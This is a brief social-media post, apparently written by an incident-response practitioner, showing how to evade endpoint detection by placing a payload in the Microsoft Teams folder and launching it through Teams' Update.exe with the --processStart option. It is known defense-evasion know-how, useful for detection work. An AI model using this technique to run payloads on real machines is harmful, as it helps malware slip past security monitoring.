How to bypass EDR with Microsoft Teams ?

• Copy payload into: %userprofile%\AppData\Local\Microsoft\Teams\current\

• Then: %userprofile%\AppData\Local\Microsoft\Teams\Update.exe --processStart payload.exe --process-start-args "args"

Credit: Elli (IR)
#microsoft #teams #windows #informatique